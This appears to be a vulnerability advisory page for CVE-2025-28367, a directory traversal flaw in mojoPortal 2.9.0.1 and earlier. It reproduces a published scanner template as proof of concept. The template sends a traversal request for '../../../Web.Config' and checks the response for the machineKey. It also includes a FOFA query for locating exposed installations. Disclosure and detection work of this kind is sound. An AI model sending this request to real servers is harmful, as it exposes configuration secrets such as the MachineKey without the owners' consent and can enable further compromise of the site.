漏洞描述
mojoPortal <=2.9.0.1 is vulnerable to Directory Traversal via BetterImageGallery API Controller - ImageHandler Action. An attacker can exploit this vulnerability to access the Web.Config file and obtain the MachineKey.
CVE-2025-28367: mojoPortal <=2.9.0.1 - Directory Traversal
PoC代码[已公开]
id: CVE-2025-28367
info:
name: mojoPortal <=2.9.0.1 - Directory Traversal
author: DhiyaneshDk
severity: medium
description: |
mojoPortal <=2.9.0.1 is vulnerable to Directory Traversal via BetterImageGallery API Controller - ImageHandler Action. An attacker can exploit this vulnerability to access the Web.Config file and obtain the MachineKey.
reference:
- https://github.com/i7MEDIA/mojoportal
- https://www.0xlanks.me/blog/cve-2025-28367-advisory/
- https://nvd.nist.gov/vuln/detail/CVE-2025-28367
classification:
epss-score: 0.10002
epss-percentile: 0.92792
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2025-28367
cwe-id: CWE-284
metadata:
verified: true
max-request: 1
fofa-query: app="mojoportal"
tags: cve,cve2025,mojoportal,lfi,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/BetterImageGallery/imagehandler?path=../../../Web.Config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<machineKey"
- "<system.web>"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221008d72755e04934e684a665d2d6991ac0ee0600aca34ae5de34f22370c23406d3002206f62f3e4b7d2badf77687e6b6a713306ac29b01f2a185e84023b32cb0d4d4cff:922c64590222798bb761d5b6d8e72950